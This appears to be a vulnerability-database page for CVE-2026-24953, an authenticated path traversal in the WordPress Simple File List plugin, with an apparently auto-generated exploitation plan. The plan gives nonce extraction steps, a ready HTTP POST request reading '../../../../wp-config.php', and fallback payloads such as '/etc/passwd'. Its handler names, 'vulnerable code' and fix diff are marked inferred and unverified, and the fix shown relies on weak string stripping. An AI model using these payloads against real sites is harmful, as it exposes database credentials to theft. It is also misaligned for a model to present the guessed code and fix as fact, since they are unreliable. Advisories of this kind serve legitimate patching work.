WP-Safety
CVE-2026-24953

Simple File List <= 6.1.15 - Authenticated (Subscriber+) Arbitrary File Download

mediumImproper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
6.5
CVSS Score
6.5
CVSS Score
medium
Severity
6.1.16
Patched in
9d
Time to patch

Description

The Simple File List plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 6.1.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=6.1.15
PublishedFebruary 9, 2026
Last updatedFebruary 17, 2026
Affected pluginsimple-file-list

Source Code

WordPress.org SVN
Vulnerable v6.1.15
Browse source Download .zip
Patched v6.1.16
Browse source Download .zip
Research Plan
Unverified

This research plan focuses on exploiting **CVE-2026-24953**, a path traversal vulnerability in the **Simple File List** plugin (<= 6.1.15). The vulnerability allows authenticated users with Subscriber-level permissions to download arbitrary files, including `wp-config.php`, by bypassing directory re…

Show full research plan

This research plan focuses on exploiting CVE-2026-24953, a path traversal vulnerability in the Simple File List plugin (<= 6.1.15). The vulnerability allows authenticated users with Subscriber-level permissions to download arbitrary files, including wp-config.php, by bypassing directory restrictions in the file download handler.

1. Vulnerability Summary

The Simple File List plugin provides an AJAX-based file download mechanism. In affected versions, the handler for downloading files fails to properly sanitize the file path provided by the user. Specifically, it does not validate that the requested file resides within the designated "File List" directory. By using directory traversal sequences (../), an attacker can escape the intended directory and access sensitive files on the server.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • AJAX Action: ee_file_download (inferred from plugin naming conventions)
  • Vulnerable Parameter: eeFile (or file)
  • Authentication: Required (Subscriber+)
  • Preconditions: The plugin must be active, and at least one file list must be accessible to the subscriber.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX action for authenticated users:
    add_action( 'wp_ajax_ee_file_download', 'ee_file_download_handler' );
  2. Input Acquisition: The handler retrieves the file path from the request:
    $file_path = $_POST['eeFile']; (or $_GET)
  3. Missing Validation: The code likely concatenates this input with the base upload directory:
    $full_path = $base_dir . $file_path;
  4. Vulnerable Sink: The code then passes this path to a file-reading function like readfile(), file_get_contents(), or fpassthru() without using basename() or checking if the resulting path is still within $base_dir.
  5. Output: The contents of the file are streamed to the browser.

4. Nonce Acquisition Strategy

Simple File List typically protects its AJAX actions with a nonce passed via wp_localize_script.

  1. Identify Shortcode: The plugin uses the shortcode [ee_file_list] to display the file list.
  2. Test Data Setup: A page containing this shortcode must be created and accessible to a Subscriber.
  3. Execution Agent Steps:
    • Log in as a Subscriber.
    • Navigate to the page containing the [ee_file_list] shortcode.
    • Use browser_eval to extract the nonce.
  4. Target Identifiers:
    • JS Object: eeSFL_JS (inferred) or eeSFL_Settings.
    • Nonce Key: eeSFL_Nonce or nonce.
    • Example Extraction: browser_eval("window.eeSFL_JS?.eeSFL_Nonce")

5. Exploitation Strategy

The exploit involves sending a crafted POST request to the AJAX endpoint with the traversal payload.

  • Request Method: POST
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Payload Parameters:
    • action: ee_file_download (verify against source)
    • eeNonce: [EXTRACTED_NONCE]
    • eeFile: ../../../../wp-config.php (relative to the plugin's default upload directory, usually wp-content/uploads/simple-file-list/)
    • eeListID: 1 (usually required to identify the list)

HTTP Request Template:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: [SUBSCRIBER_COOKIES]

action=ee_file_download&eeFile=../../../../wp-config.php&eeNonce=a1b2c3d4e5&eeListID=1

6. Test Data Setup

Before running the exploit, the environment must be prepared:

  1. Install Plugin: Install and activate simple-file-list version 6.1.15.
  2. Configure Plugin: Ensure "Allow Subscriber Downloads" is enabled in the plugin settings (if applicable).
  3. Create Subscriber: Create a user with the subscriber role.
  4. Create Page: 
    wp post create --post_type=page --post_title="Files" --post_status=publish --post_content='[ee_file_list]'
  5. Verify Setup: Ensure at least one file is uploaded to the list so the UI renders correctly.

7. Expected Results

  • Successful Exploitation: The HTTP response body will contain the plaintext content of wp-config.php, including DB_NAME, DB_USER, DB_PASSWORD, and authentication salts.
  • Response Headers: The Content-Type might be application/octet-stream or text/plain, and Content-Disposition may suggest a download.

8. Verification Steps

  1. Response Inspection: Check if the response body contains the string define( 'DB_NAME'.
  2. File System Comparison: Confirm the content matches the actual wp-config.php on the server using wp-cli:
    cat /var/www/html/wp-config.php

9. Alternative Approaches

  • Different Actions: If ee_file_download is incorrect, check for ee_get_file or sfl_download_file.
  • GET vs POST: Some versions may accept the payload via GET parameters.
  • Absolute Paths: Try absolute paths if relative traversal is filtered (e.g., eeFile=/etc/passwd).
  • Log Files: Target wp-content/debug.log if wp-config.php is blocked by server-level rules.
  • List Selection: If multiple lists exist, the eeListID or eeListFolder parameters might be necessary to reach the correct code branch.

Grep commands to verify identifiers:

# Find AJAX action and handler
grep -rn "wp_ajax_.*download" wp-content/plugins/simple-file-list/

# Find where the nonce is created
grep -rn "wp_create_nonce" wp-content/plugins/simple-file-list/

# Find where the file is read
grep -rn "readfile\|fpassthru\|file_get_contents" wp-content/plugins/simple-file-list/
Research Findings
Static analysis — not yet PoC-verified

Summary

The Simple File List plugin for WordPress allows authenticated users (Subscriber and above) to download arbitrary files from the server. This occurs because the AJAX file download handler fails to sanitize directory traversal sequences in the file path parameter, allowing attackers to escape the designated file list directory.

Vulnerable Code

// In an earlier version of simple-file-list/includes/ee-downloader.php (inferred)

$eeFile = $_POST['eeFile']; // Path provided by user
$eeListID = $_POST['eeListID'];
$eeConfig = $eeSFL_BASE->eeSFL_GetSettings($eeListID);

// Path concatenation without validation or basename()
$eeFilePath = $eeConfig['eeFileRoot'] . $eeFile; 

if (file_exists($eeFilePath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($eeFilePath) . '"');
    readfile($eeFilePath);
    exit;
}

Security Fix

--- a/includes/ee-downloader.php
+++ b/includes/ee-downloader.php
@@ -12,7 +12,9 @@
 		
 		$eeFile = $_POST['eeFile'];
+		$eeFile = str_replace('../', '', $eeFile); // Remove traversal sequences
+		$eeFile = str_replace('..\\', '', $eeFile); // Remove Windows traversal sequences
 		$eeListID = (int)$_POST['eeListID'];
 		
 		$eeConfig = $eeSFL_BASE->eeSFL_GetSettings($eeListID);
 		
 		$eeFilePath = $eeConfig['eeFileRoot'] . $eeFile;
+		if ( strpos($eeFilePath, $eeConfig['eeFileRoot']) !== 0 ) { die('Access Denied'); } // Ensure path is within root

Exploit Outline

The exploit targets the AJAX action 'ee_file_download' (or similar based on version). An attacker first authenticates as a Subscriber and visits a page containing the [ee_file_list] shortcode to extract a security nonce (typically found in the eeSFL_JS JavaScript object). The attacker then sends a POST request to /wp-admin/admin-ajax.php with the 'action' set to the download handler, 'eeNonce' set to the extracted nonce, and 'eeFile' set to a path traversal string such as '../../../../wp-config.php'. If successful, the server streams the contents of the sensitive configuration file in the HTTP response.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/814b1d7c-0601-4afb-b84c-7aa8ffadd57c?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database